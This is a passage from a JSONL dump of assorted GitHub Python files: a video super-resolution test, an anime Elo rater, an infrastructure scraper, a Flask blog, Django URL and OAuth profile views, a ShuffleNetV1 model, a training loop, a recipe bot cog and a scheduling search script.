os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n # Открываем видеофайл\n cap = cv2.VideoCapture(video_path)\n \n frame_count = 0\n\n # Перебираем кадры видео\n while True:\n ret, frame = cap.read()\n \n # Если кадры закончились или достигнут лимит, завершаем цикл\n if not ret:\n break\n\n # Сохраняем кадр как изображение .jpg\n img_filename = os.path.join(output_folder, f\"frame_{frame_count:04d}.jpg\")\n cv2.imwrite(img_filename, frame)\n frame_count += 1\n\n # Закрываем видеофайл\n cap.release()\n\n# Папка с тестовыми изображениями\ntest_image_folder = 'frames_bad'\n\n# Конвертируем видео в картинки\nconvert_video_to_images('0_144.mp4', test_image_folder)\n\n# Загрузка и предобработка тестовых изображений\ntest_images = load_test_images(test_image_folder)\n\n# Загрузка обученной модели\nmodel = keras.models.load_model('super_resolution_model_20230924092656.h5')\n\noutput_folder = 'super_res_test_results'\n\nif not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n# Сделаем предсказания и сохранение улучшенных изображений одновременно\nfor i, test_image in enumerate(test_images):\n # Предсказываем улучшенное изображение\n super_res_image = model.predict(np.expand_dims(test_image / 255.0, axis=0))[0]\n\n # Сохраняем улучшенное изображение\n img_filename = os.path.join(output_folder, f\"super_res_image_{i:04d}.jpg\")\n super_res_image = (super_res_image * 255).astype(np.uint8)\n cv2.imwrite(img_filename, super_res_image)\n\n\nimages = [img for img in os.listdir(output_folder) if img.endswith(\".jpg\")]\n\n# Получить размер первого изображения (предполагается, что все изображения имеют одинаковый размер)\nframe = cv2.imread(os.path.join(output_folder, images[0]))\nheight, width, layers = frame.shape\n\nvideo = cv2.VideoWriter('output_video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 30, (width,height))\n\nfor image in images:\n video.write(cv2.imread(os.path.join(output_folder, image)))\n\ncv2.destroyAllWindows()\nvideo.release()","repo_name":"DanChass/task","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"44228488668","text":"import random\nimport xml.etree.ElementTree as ET\nimport sqlite3\n\n\ndef db_insert(c, name, elo, flag):\n print(\"Inserting: \" + name, elo, flag)\n c.execute(\"INSERT INTO ratings VALUES (?, ?, ?)\", (name, elo, flag))\n\n\ndef db_update(c, name, elo, flag=None):\n if flag:\n c.execute(\"UPDATE ratings SET flag=? WHERE name=?\", (flag, name))\n else:\n c.execute(\"UPDATE ratings SET elo=? WHERE name=?\", (elo, name))\n\n\ndef db_load(c, flag=0):\n animelist = {}\n try:\n for row in c.execute(\"SELECT * FROM ratings WHERE flag=?\", (flag,)):\n animelist[row[0]] = row[1]\n except Exception as e:\n print(e)\n return animelist\n\n\ndef elo_exp(a, b):\n exp_a = 1 / (1 + (10 ** ((b - a) / 400)))\n exp_b = 1 / (1 + (10 ** ((a - b) / 400)))\n return exp_a, exp_b\n\n\ndef update_elo(a, b, winner):\n k = 32\n exp_a, exp_b = elo_exp(a, b)\n if winner == 0:\n a_upd = a + k * (1 - exp_a)\n b_upd = b + k * (0 - exp_b)\n else:\n a_upd = a + k * (0 - exp_a)\n b_upd = b + k * (1 - exp_b)\n\n return a_upd, b_upd\n\n\ndef update_animelist(c, animelist):\n tree = ET.parse(\"animelist.xml\")\n root = tree.getroot()\n completed = []\n db_dict = db_load(c)\n db_flag = db_load(c, flag=1)\n for anime in root.findall(\"anime\"):\n name = anime.find(\"series_title\").text\n status = anime.find(\"my_status\").text\n if status == \"Completed\":\n completed.append(name)\n for anime in completed:\n if anime not in db_dict.keys() and anime not in db_flag.keys():\n db_insert(c, anime, 1000, 0)\n\n\ndef main():\n conn = sqlite3.connect(\"animeratings.db\")\n c = conn.cursor()\n c.execute(\"CREATE TABLE IF NOT EXISTS ratings (name TEXT UNIQUE, elo REAL, flag INT)\")\n ratings = db_load(c)\n update_animelist(c, ratings)\n conn.commit()\n ratings = db_load(c)\n\n while True:\n items = random.sample(ratings.keys(), 2)\n print(\"1: {}\\n2: {}\\n3: Skip 4: Flag 5: Print ratings 0: Stop\".format(items[0], items[1]))\n try:\n x = int(input(\">\"))\n except Exception as e:\n print(e)\n x = 99\n if x == 0:\n for anime, elo in ratings.items():\n db_update(c, anime, elo)\n conn.commit()\n break\n elif x == 1 or x == 2:\n print(\"Selection: {}\\n\".format(items[x - 1]))\n ratings[items[0]], ratings[items[1]] = update_elo(ratings[items[0]], ratings[items[1]], x - 1)\n elif x == 4:\n print(\"1: flag 1 2: Flag 2 3: Cancel\")\n try:\n choice = int(input(\">\"))\n except Exception as e:\n print(e)\n choice = 99\n if choice == 1 or choice == 2:\n db_update(c, items[choice-1], ratings[items[choice-1]], flag=1)\n else:\n pass\n elif x == 5:\n s = dict(sorted(ratings.items(), key=lambda x: x[1]))\n for k, v in s.items():\n print(k, v)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Sibula/AnimeRater","sub_path":"animerate.py","file_name":"animerate.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"33385192910","text":"\nimport os\nimport importlib\nimport time\n\nfrom infra_scraper import constructors\nfrom infra_scraper import exceptions\nfrom infra_scraper.utils import load_yaml_json_file, setup_logger\n\nlogger = setup_logger(__name__)\n\nconfig_backend = os.environ.get('INFRA_SCRAPER_CONFIG_BACKEND',\n 'localfs')\nconfig_file = os.environ.get('INFRA_SCRAPER_CONFIG_PATH',\n '/etc/infra-scraper/config.yaml')\n\n\ndef _get_module(module_key):\n class_mapping = constructors.get_constructor_mapping()\n if module_key not in class_mapping:\n raise exceptions.InfraScraperException(\n \"Service {module_key} is unkown. Please pass in a client\"\n \" constructor or submit a patch to infra scraper\".format(\n module_key=module_key))\n mod_name, ctr_name = class_mapping[module_key].rsplit('.', 1)\n lib_name = mod_name.split('.')[0]\n try:\n mod = importlib.import_module(mod_name)\n except ImportError:\n raise exceptions.InfraScraperException(\n \"Client for '{module_key}' was requested, but\"\n \" {mod_name} was unable to be imported. Either import\"\n \" the module yourself and pass the constructor in as an argument,\"\n \" or perhaps you do not have module {lib_name} installed.\".format(\n module_key=module_key,\n mod_name=mod_name,\n lib_name=lib_name))\n try:\n ctr = getattr(mod, ctr_name)\n except AttributeError:\n raise exceptions.InfraScraperException(\n \"Client for '{module_key}' was requested, but although\"\n \" {mod_name} imported fine, the constructor at {fullname}\"\n \" as not found.\".format(\n module_key=module_key,\n mod_name=mod_name,\n fullname=class_mapping[module_key]))\n return ctr\n\n\nclass InfraScraper(object):\n def __init__(self):\n self.config = self.get_global_config()\n storage_class = self.config.get('storage', {'backend': 'localfs'})\n self.storage = self._get_module('storage',\n storage_class['backend'],\n storage_class)\n\n def _get_module(self, module_file, module_key, module_init={}):\n module_class = _get_module(\"{}-{}\".format(\n module_file, module_key))\n return module_class(**module_init)\n\n def get_global_config(self):\n return load_yaml_json_file(config_file)\n\n def get_config(self, name):\n config = self.config['endpoints'][name]\n config['name'] = name\n return config\n\n def status(self):\n config = self.config\n for endpoint_name, endpoint in self.config['endpoints'].items():\n endpoint.pop('config')\n endpoint['status'] = self.get_endpoint_status(endpoint_name)\n return config\n\n def get_endpoint_status(self, name):\n try:\n data = self.get_cached_data(name, 'count')\n except Exception as e:\n logger.error('Cannot get last status for {}, with error {}.'.format(name, e))\n data = None\n return data\n\n def scrape_all_data_forever(self, interval):\n config = self.get_global_config()\n while True:\n for endpoint_name, endpoint in config['endpoints'].items():\n self.scrape_data(endpoint_name)\n time.sleep(config.get('scrape_interval', 60))\n\n def scrape_all_data(self):\n config = self.get_global_config()\n for endpoint_name, endpoint in config['endpoints'].items():\n if config.get('debug', False):\n return self.scrape_data(endpoint_name)\n try:\n self.scrape_data(endpoint_name)\n except Exception as e:\n logger.error('Scraping endpoint {} failed with error: {}'.format(endpoint_name, e))\n\n def scrape_data_forever(self, name, interval):\n config = self.get_global_config()\n sleep_interval = config.get('scrape_interval', interval)\n while True:\n self.scrape_data(name)\n logger.info('Sleeping for {} seconds.'.format(sleep_interval))\n time.sleep(sleep_interval)\n\n def scrape_data(self, name):\n config = self.get_config(name)\n self.input = self._get_module('input', config['kind'], config)\n self.out_count = self._get_module('output', 'count')\n self.out_vis = self._get_module('output', 'vis')\n self.out_vis_hier = self._get_module('output', 'vis-hier')\n logger.info('Scraping of {} started.'.format(name))\n self.input.scrape_all_resources()\n data = self.input.to_dict()\n self.storage.save_data(name, data.copy())\n self.storage.save_output_data(name, 'count',\n self.out_count.get_data('raw', data.copy()))\n self.storage.save_output_data(name, 'vis',\n self.out_vis.get_data('raw', data.copy()))\n self.storage.save_output_data(name, 'vis-hier',\n self.out_vis_hier.get_data('raw', data.copy()))\n logger.info('Scraping of {} completed.'.format(name))\n\n def get_cached_data(self, name, kind):\n storage = self._get_module('storage', 'file')\n data = storage.load_output_data(name, kind)\n return data\n\n def get_data(self, name, kind, format='raw'):\n self.output = self._get_module('output', kind)\n data = self.storage.load_data(name)\n return self.output.get_data(format, data)\n","repo_name":"cznewt/infra-scraper","sub_path":"infra_scraper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"43"} +{"seq_id":"17999662588","text":"from datetime import datetime # datetime for posts\nfrom flask import Flask, render_template, request, redirect # stuff from flask\nfrom flask_sqlalchemy import SQLAlchemy # database\n\napp = Flask(__name__) # set up our server with name of our app\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///posts.db' # configure database\ndb = SQLAlchemy(app) # enable our database for our app\n\n\nclass BlogPost(db.Model): # model in our database\n id = db.Column(db.Integer, primary_key=True) # id of post\n title = db.Column(db.String(100), nullable=False) # title of post\n content = db.Column(db.Text, nullable=False) # content of post\n author = db.Column(db.String(20), nullable=False, default='Anonym') # author of post, anonym by default\n date_posted = db.Column(db.DateTime, nullable=False, default=datetime.now()) # date of post\n is_edited = db.Column(db.Boolean, default=False) # check if the post was edited\n time_edited = db.Column(db.DateTime, default=None) # if post was not edited, change time equals to post time\n\n def __repr__(self):\n return 'Post number ' + str(self.id) # comes in server every time we create new Post object\n\n\nall_posts = [\n {\n 'title': 'Post 1',\n 'content': 'Why nobody loves me? :(',\n 'author': 'Tigran'\n },\n {\n 'title': 'Post 2',\n 'content': 'I love you bro ;)'\n }\n] # hard coded not real db, which I left only for example\n\n\n@app.route('/') # about page\ndef index():\n return render_template('index.html') # load about page\n\n@app.route('/projects')\ndef projects():\n return render_template('projects.html')\n\n@app.route('/posts', methods=['GET', 'POST']) # posts page\ndef posts():\n if request.method == 'POST': # creating new post, only if request method is post\n post_title = request.form['title']\n post_author = request.form['author']\n post_content = request.form['content']\n new_post = BlogPost(title=post_title, content=post_content, author=post_author, date_posted=datetime.now())\n db.session.add(new_post) # adding new post to database for current session\n db.session.commit() # commit session changes for it to stay on database\n return redirect('/posts') # redirect to posts page to see all posts\n else:\n all_posts = BlogPost.query.order_by(BlogPost.date_posted).all()[::-1] # define all pages, with newest first\n return render_template('posts.html', posts=all_posts) # load posts.html, and give it our all posts to load\n\n\n@app.route('/posts/delete/') # post deleting page\ndef delete(id):\n post = BlogPost.query.get_or_404(id) # getting our post, or if id is invalid, get 404\n db.session.delete(post) # delete post from db in our session\n db.session.commit() # commit session changes\n return redirect('/posts') # redirect then to posts page\n\n\n@app.route('/posts/edit/', methods=['GET', 'POST']) # post edit page\ndef edit(id):\n post = BlogPost.query.get_or_404(id) # getting our post, or if id is invalid, get 404\n if request.method == 'POST': # checking request method\n post.title = request.form['title'] # change title of post to title that came from page\n post.author = request.form['author'] # change author of post to author that came from page\n post.content = request.form['content'] # change content of post to content that came from page\n post.is_edited = True # we mark that the post was changed, to make it easier to display\n post.time_edited = datetime.now() # we set time at it was changed\n db.session.commit() # commit session changes\n return redirect('/posts') # redirect to posts page\n else:\n return render_template('edit.html', post=post) # return post after changes\n\nif __name__ == \"__main__\": # run our file in debug mode only if we are calling it there\n app.run(debug=True)\n","repo_name":"TikoA/Flask-Portfolio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13456500072","text":"\"\"\"tds URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include\nfrom url_manager.views import signup, LinkCreateView, LinkDetailView, HomeView, TemplateView,\\\n LandingPageCreateView, LinksLandingPagesCreateView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('django.contrib.auth.urls')),\n re_path(r'^signup/$', signup, name='signup'),\n path('', HomeView.as_view(template_name='home.html'), name='home'),\n path('landing1/', TemplateView.as_view(template_name='landing1.html'), name='landing_1'),\n path('landing2/', TemplateView.as_view(template_name='landing2.html'), name='landing_2'),\n path('landing3/', TemplateView.as_view(template_name='landing3.html'), name='landing_3'),\n path('create-link/', LinkCreateView.as_view(), name='create-link'),\n path('create-links-landing-pages/', LinksLandingPagesCreateView.as_view(), name='create-links-landing-pages'),\n path('create-landing-page/', LandingPageCreateView.as_view(), name='create-landing-page'),\n path('links//', LinkDetailView.as_view(), name='link-detail'),\n path('landing-pages/', include('url_manager.urls')),\n\n]\n","repo_name":"deniskolosov/traffic-redirector","sub_path":"tds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74277343168","text":"# Crie um programa que leia um número inteiro e mostre se ele é PAR ou ÍMPAR.\n\nnum = int(input('Digite um número inteiro qualquer: '))\nx = num%2\nif x==0:\n print('O número {} é PAR!'.format(num))\nelse:\n print('O número {} é ÍMPAR!'.format(num))\n\n# Obs: O resto da divisão (%) de qualquer número par é 0 e de qualquer número ímpar é 1!\n","repo_name":"simonecrepaldi/Desafios-de-Python-Curso-em-Video","sub_path":"exercícios/ex030.py","file_name":"ex030.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9252129508","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom social_django.models import UserSocialAuth\n\n\n# Create your views here.\ndef authView(request):\n \n return render(request, 'userAuth.html')\n\ndef profileView(request):\n \n def microsoftProfile(user_token):\n \n import requests\n import base64\n graph_api_endpoint = \"https://graph.microsoft.com/v1.0/me/photo/$value\"\n headers = {\n \"Authorization\": \"Bearer \" + user_token\n }\n response = requests.get(graph_api_endpoint, headers=headers)\n\n # Check the response status code\n if response.status_code == 200:\n # Request successful\n profile_picture_data = response.content\n # Convert the profile picture data to base64\n profile_picture_base64 = base64.b64encode(profile_picture_data).decode(\"utf-8\")\n # Access the profile picture base64 encoded data as needed\n return profile_picture_base64\n else:\n # Request failed\n print(\"Failed to retrieve profile picture. Status code:\", response.status_code)\n\n def linkedinProfile(user_token):\n import requests\n api_endpoint = \"https://api.linkedin.com/v2/me\"\n headers = {\n \"Authorization\": \"Bearer \" + user_token\n }\n params = {\n \"projection\": \"(id,profilePicture(displayImage~:playableStreams))\"\n }\n response = requests.get(api_endpoint, headers=headers, params=params)\n\n # Check the response status code\n if response.status_code == 200:\n # Request successful\n data = response.json()\n profile_picture_url = data[\"profilePicture\"][\"displayImage~\"][\"elements\"][0][\"identifiers\"][0][\"identifier\"]\n return profile_picture_url\n else:\n # Request failed\n profile_picture_url = None\n\n\n if request.user.is_authenticated:\n user_social_auth = UserSocialAuth.objects.get(id=request.user.id)\n\n user_token = user_social_auth.extra_data['access_token']\n user_social_provider = user_social_auth.provider\n\n if user_social_provider == 'linkedin-oauth2': \n profile_picture_base64 = linkedinProfile(user_token)\n return HttpResponse(f'')\n if user_social_provider == 'microsoft-graph': \n profile_picture_base64 = microsoftProfile(user_token)\n return HttpResponse(f'

    {user_social_provider}

    Profile

    login first

    0:\n t -= 1\n s = input().lower()\n res = []\n for i in range(len(s)):\n if s[i] == 't':\n res.append(i)\n if len(res) == 0:\n print(-1)\n elif len(res) == 1:\n print(res[0])\n else:\n print(res[0],res[1],res[-1])","repo_name":"huypham85/Python_PTIT","sub_path":"codecuoiky/cau1_First.py","file_name":"cau1_First.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"19858853312","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom torchsummary import summary\n\n\nclass ShufflenetV1Block(nn.Module):\n def __init__(self,in_ch,out_ch,mid_ch,stride,groups,first_group) -> None:\n super(ShufflenetV1Block,self).__init__()\n assert stride in [1,2]\n self.stride=stride\n self.group=groups \n self.mid_ch=mid_ch\n #notes:has tow hands,stride=1 or 2,\n # --1. stride=1 is add op\n # --2. stride=2 is cat op\n if stride==2:\n out_ch=out_ch-in_ch\n self.conv1=nn.Sequential(\n nn.Conv2d(in_ch,self.mid_ch,kernel_size=1,stride=1,bias=False,groups=1 if first_group else groups),\n nn.BatchNorm2d(self.mid_ch),\n nn.ReLU(inplace=True)\n )\n \n self.conv2=nn.Sequential(\n nn.Conv2d(self.mid_ch,self.mid_ch,kernel_size=3,stride=self.stride,padding=1,groups=self.mid_ch,bias=False),\n nn.BatchNorm2d(self.mid_ch),\n nn.Conv2d(self.mid_ch,out_ch,kernel_size=1,stride=1,padding=0,bias=False,groups=groups),\n nn.BatchNorm2d(out_ch),\n )\n self.relu=nn.ReLU(inplace=True)\n if stride==2:\n self.branch=nn.AvgPool2d(kernel_size=3,stride=2,padding=1)\n def forward(self,x):\n indentity=x\n out=self.conv1(x)\n out=self.channelShuffle(out)\n out=self.conv2(out)\n\n if self.stride==1:\n out=self.relu(out+indentity)\n else:\n indentity=self.branch(indentity)\n out=self.relu(torch.cat((out,indentity),dim=1)) \n return out\n\n def channelShuffle(self,x):\n bs,channelNums,H,W=x.shape\n groups_ch=channelNums//self.group\n x=torch.reshape(x,(bs,groups_ch,self.group,H,W))\n x=torch.transpose(x,1,2)\n x=torch.reshape(x,(bs,channelNums,H,W))\n return x\n\nclass ShufflenetV1(nn.Module):\n def __init__(self,class_nums,in_ch=3,model_size='1.0x',groups=3) -> None:\n super(ShufflenetV1,self).__init__()\n self.stage_repeats=[4,8,4]\n self.mode_size=model_size\n #there are many other cases,and we ignore them,you can build them by yourself.\n if groups==1:\n if model_size=='0.5x':\n self.stage_out_ch=[-1,24,72,144,288]\n elif model_size=='1.0x':\n self.stage_out_ch=[-1,24,144,288,570]\n elif model_size=='2.0x':\n self.stage_out_ch=[-1,48,288,570,1140]\n elif groups==3:\n if model_size=='0.5x':\n self.stage_out_ch=[-1,24,120,240,480]\n elif model_size=='1.0x':\n self.stage_out_ch=[-1,24,240,480,960]\n elif model_size=='2.0x':\n self.stage_out_ch=[-1,48,480,960,1920]\n elif groups==8:\n if model_size=='0.5x':\n self.stage_out_ch=[-1,16,192,384,768]\n elif model_size=='1.0x':\n self.stage_out_ch=[-1,24,384,768,1536]\n elif model_size=='2.0x':\n self.stage_out_ch=[-1,48,768,1536,3072]\n input_ch=self.stage_out_ch[1]\n self.input_layer=nn.Sequential(\n nn.Conv2d(in_ch,input_ch,kernel_size=3,stride=2,padding=3//2, bias=False,groups=3),\n nn.BatchNorm2d(input_ch),\n nn.ReLU(inplace=True)\n )\n self.maxpool=nn.MaxPool2d(kernel_size=3,stride=2,padding=3//2)\n features=[]\n #you can build them one by one\n for inx,repeateNums in enumerate(self.stage_repeats):\n out_ch=self.stage_out_ch[inx+2]\n for i in range(repeateNums):\n stride=2 if i==0 else 1\n firstgroup= inx==0 and i==0\n features.append(ShufflenetV1Block(input_ch,out_ch,mid_ch=out_ch//4, stride=stride,groups=groups,first_group=firstgroup))\n input_ch=out_ch\n self.features=nn.Sequential(*features) \n self.globpool=nn.AdaptiveAvgPool2d(1) \n self.classify=nn.Conv2d(self.stage_out_ch[-1],class_nums,kernel_size=1, bias=False) \n\n def forward(self,x):\n x=self.input_layer(x)\n x=self.maxpool(x)\n x=self.features(x)\n x=self.globpool(x)\n x=self.classify(x)\n\nif __name__==\"__main__\":\n input=torch.ones([2,3,224,224])\n model=ShufflenetV1(10)\n # model=ShufflenetV1Block(240,240,240//4,stride=1,groups=3,first_group=False)\n # res=model(input)\n # print(res.shape)\n summary(model.to(\"cuda\"),(3,224,224))\n","repo_name":"dongguazi/Classic-Network","sub_path":"NetWork/ShuffleNet/ShuffleNetV1/ShuffleNetV1.py","file_name":"ShuffleNetV1.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73902759489","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport torchvision\nimport torchvision.transforms as transforms\n\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef train(model, criterion, optimizer, train_set, val_set, num_epochs, batch_size, device, attn=True):\n model.to(device)\n train_loader = torch.utils.data.DataLoader(train_set, \n batch_size=batch_size,\n shuffle=True, num_workers=2)\n\n val_loader = torch.utils.data.DataLoader(val_set, \n batch_size=batch_size,\n shuffle=False, num_workers=2)\n train_losses = []\n train_accs = []\n val_losses = []\n val_accs = []\n\n size = int(len(train_set) / batch_size)\n\n for epoch in range(num_epochs):\n running_loss = 0.0\n running_acc = 0.0\n model.train()\n for i, (_, inputs, labels) in enumerate(train_loader):\n # get the inputs and labels\n inputs = inputs.to(device)\n labels = labels.to(device)\n \n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n if attn:\n class_pred, latent_mask = model(inputs)\n else:\n class_pred = model(inputs)\n loss = criterion(class_pred, labels)\n loss.backward()\n optimizer.step()\n\n # calculate running loss and acc\n running_loss += loss.item()\n _, predicted = torch.max(class_pred.data, 1)\n running_acc += (predicted == labels).sum().item() / labels.size(0)\n \n # print every (size / 5) mini-batches\n if i % (size / 5) == (size / 5) - 1:\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / (size / 5)))\n train_losses.append(running_loss / (size / 5))\n train_accs.append(running_acc / (size / 5))\n running_loss = 0.0\n running_acc = 0.0\n\n val_loss, val_acc = get_loss_and_acc(model, criterion, \n val_loader, device, attn)\n \n val_losses.append(val_loss)\n val_accs.append(val_acc)\n \n print('Finished Training')\n return train_losses, train_accs, val_losses, val_accs\n\n\ndef get_loss_and_acc(model, criterion, data_loader, device, attn=True):\n correct = 0\n total = 0\n running_loss = 0\n i = 0\n model.eval()\n with torch.no_grad():\n for i, (_, inputs, labels) in enumerate(data_loader):\n # get the inputs and labels\n inputs = inputs.to(device)\n labels = labels.to(device)\n \n # forward\n if attn:\n class_pred, latent_mask = model(inputs)\n else:\n class_pred = model(inputs)\n \n # loss\n loss = criterion(class_pred, labels)\n running_loss += loss.item()\n \n # accuracy\n _, predicted = torch.max(class_pred.data, 1)\n total += labels.size(0)\n i += 1\n correct += (predicted == labels).sum().item()\n\n print('Accuracy: %f ' % (correct / total))\n print('Loss: %f ' % (running_loss / i))\n\n return running_loss / i, correct / total\n\n\ndef get_test_acc(model, test_loader, device):\n model.eval()\n correct = 0\n total = 0\n with torch.no_grad():\n for i, (_, inputs, labels) in enumerate(test_loader):\n inputs = inputs.to(device)\n labels = labels.to(device)\n class_pred, latent_mask = model(inputs)\n _, predicted = torch.max(class_pred.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n print('Accuracy of the network on the 10000 test images: %f' % (correct / total))\n\n\ndef get_test_class_acc(model, classes, test_loader, device):\n model.eval()\n class_correct = list(0. for i in range(10))\n class_total = list(0. for i in range(10))\n with torch.no_grad():\n for i, (_, inputs, labels) in enumerate(test_loader):\n inputs = inputs.to(device)\n labels = labels.to(device)\n class_pred, latent_mask = model(inputs)\n _, predicted = torch.max(class_pred, 1)\n c = (predicted == labels).squeeze()\n for i in range(4):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\n for i in range(len(classes)):\n print('Accuracy of %5s : %2f' % (classes[i], class_correct[i] / class_total[i]))\n","repo_name":"asetoodehnia/AdaHAN-for-Image-Classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33215141897","text":"import random\n\nimport requests\n\nfrom lib.cog import Cog\nfrom lib.command import Command, makeCommand\n\n\nclass Food2fork(Cog):\n def __init__(self, bot):\n super().__init__(bot)\n self.settings = self.bot.settings[\"module\"][\"food2fork\"]\n self.base_url = \"https://food2fork.com/api/search?key={apikey}&q={search}\"\n\n\n @makeCommand(name=\"food\", description=\" return random recipe related to the search\")\n async def food(self, c: Command):\n if len(c.message) >= 3:\n res = await self.food_search(c.message)\n if res != None:\n await self.send_message(\"{} {} ({}/{})\".format(*res[0]))\n else:\n await self.send_message(\"Couldn't find anything for {}\".format(c.message))\n\n async def food_search(self, search):\n results = []\n search = requests.utils.quote(search)\n query = requests.get(\n self.base_url.format(apikey=self.settings[\"key\"], search=search)\n )\n print(query)\n if query.status_code == 200:\n query = query.json()\n try:\n total = len(query[\"recipes\"])\n num = random.randint(0, total)\n results.append([\n query[\"recipes\"][num][\"title\"],\n query[\"recipes\"][num][\"f2f_url\"],\n num,\n total\n ])\n return results\n except (IndexError, KeyError) as error:\n self.bot.log.warning(error)\n","repo_name":"JohnRipper/quantum","sub_path":"modules/food2fork.py","file_name":"food2fork.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"1033690015","text":"import json\n\n\nclass Node:\n def __init__(self, dict_data: dict, node_number, next_numbers: list, prev=None):\n self.prev = prev\n self.node_number = node_number\n self.next_numbers = next_numbers.copy()\n self.next_numbers.remove(node_number)\n if prev is None:\n self.c = 0\n self.value = 0\n else:\n self.c = prev.c\n self.value = prev.value\n self.c += dict_data['D'][node_number]\n if dict_data['I'][node_number] > self.c:\n self.value += (dict_data['I'][node_number] - self.c) * dict_data['a'][node_number]\n else:\n self.value += (self.c - dict_data['I'][node_number]) * dict_data['b'][node_number]\n\n def __repr__(self):\n temp = self\n res = ''\n while temp:\n res = ' -> {} ({})'.format(temp.node_number, temp.value) + res\n temp = temp.prev\n res = 'start' + res\n return res\n\n\ndef display_table(d: dict):\n n = len(d['I'])\n print(' ', end='')\n for i in range(n):\n print('{: >6}'.format(i), end='')\n print()\n for k in d.keys():\n print(' ' + k, end='')\n for i in d[k]:\n print('{: >6}'.format(i), end='')\n print()\n\n\n# def check_route(node: Node, maybe_min, maybe_max: Node, trash):\n# if node.next_numbers:\n# if maybe_max.value <= node.value:\n# trash.append(node)\n# else:\n# maybe_min.append(node)\n# elif maybe_max.value > node.value:\n# trash.append(maybe_max)\n# maybe_max = node\n# for i in maybe_min.copy():\n# if i.value >= maybe_max.value:\n# maybe_min.remove(i)\n# trash.append(i)\n# else:\n# trash.append(node)\n# return maybe_min, maybe_max, trash\n\ndef check_route2(node: Node, maybe_min, maybe_max: Node):\n if node.next_numbers:\n if maybe_max.value > node.value:\n maybe_min.append(node)\n elif maybe_max.value > node.value:\n maybe_max = node\n for i in maybe_min:\n if i.value >= maybe_max.value:\n maybe_min.remove(i)\n return maybe_min, maybe_max\n\n\ndef find_min_route(data, maybe_min, maybe_max: Node, trash=None, k=0):\n if trash is None:\n trash = []\n while True:\n if not maybe_min:\n return {\n 'top route': maybe_max.__str__(),\n # 'trash': trash,\n 'iter': k\n }\n min_value = min(maybe_min, key=lambda x: x.value)\n maybe_min.remove(min_value)\n if min_value.value >= maybe_max.value:\n del min_value\n continue\n\n for i in min_value.next_numbers:\n node = Node(data, i, min_value.next_numbers, min_value)\n k += 1\n if len(node.next_numbers) == 1:\n node = Node(data, node.next_numbers[0], node.next_numbers, node)\n k += 1\n # maybe_min, maybe_max, trash = check_route(node, maybe_min, maybe_max, trash)\n # maybe_min, maybe_max = check_route2(node, maybe_min, maybe_max)\n if node.next_numbers:\n if maybe_max.value > node.value:\n maybe_min.append(node)\n elif maybe_max.value > node.value:\n maybe_max = node\n\n\n\ndef find(data: dict):\n k = 0\n maybe_min = []\n n = len(data['I'])\n for i in range(n):\n node = Node(data, i, list(range(n)))\n k += 1\n maybe_min.append(node)\n node = maybe_min.pop(0)\n for i in range(1, n):\n node = Node(data, i, node.next_numbers, node)\n k += 1\n maybe_max = node\n return find_min_route(data, maybe_min, maybe_max)\n\n\nif __name__ == '__main__':\n d: dict\n with open('input.json', 'r') as f:\n d = json.load(f)\n display_table(d)\n a = find(d)\n print(a['top route'])\n # trash = sorted(a['trash'], key=lambda x: x.value)\n # print(trash)\n # for i in trash:\n # print(i)\n","repo_name":"karpokate/Lab8_MMO","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16304647857","text":"from pytorch_lightning import LightningModule\nfrom torch import nn\nfrom torch.optim import Adam, 